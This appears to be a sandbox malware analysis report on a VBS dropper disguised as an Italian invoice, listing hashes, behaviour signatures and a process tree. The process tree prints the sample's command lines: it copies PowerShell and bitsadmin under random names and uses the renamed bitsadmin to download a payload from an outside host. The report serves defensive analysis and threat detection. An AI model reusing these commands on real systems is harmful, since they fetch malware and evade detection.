Analysis
max time kernel: 146s
max time network: 146s
platform: windows10_x64
resource: win10
submitted: 30-06-2020 11:36
Static task: static1

Behavioral task: behavioral1
Sample: FattDiffEmessa2020 03799870369.vbs
Resource: win7v200430 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: FattDiffEmessa2020 03799870369.vbs
Resource: win10 (windows10_x64)
0 signatures, 0 seconds
General
Target: FattDiffEmessa2020 03799870369.vbs
Size: 3KB
MD5: ba1697038db097aae963962a1fd5dd15
SHA1: 46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
SHA256: 79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
SHA512: d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
Score: 8/10
Malware Config

Signatures

Suspicious use of WriteProcessMemory (7 IoCs)
Processes: WScript.exe
description                          pid   process      target process
PID 3676 wrote to memory of 3236     3676  WScript.exe  cmd.exe
PID 3676 wrote to memory of 3236     3676  WScript.exe  cmd.exe
PID 3676 wrote to memory of 3812     3676  WScript.exe  cmd.exe
PID 3676 wrote to memory of 3812     3676  WScript.exe  cmd.exe
PID 3676 wrote to memory of 3804     3676  WScript.exe  DrBqNtd.exe
PID 3676 wrote to memory of 3804     3676  WScript.exe  DrBqNtd.exe
PID 3676 wrote to memory of 3804     3676  WScript.exe  DrBqNtd.exe

Executes dropped EXE (1 IoCs)
Processes: DrBqNtd.exe
pid   process
3804  DrBqNtd.exe
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe

  C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe

  C:\Users\Admin\AppData\Roaming\DrBqNtd.exe
    Command line: "C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif
    Signatures: Executes dropped EXE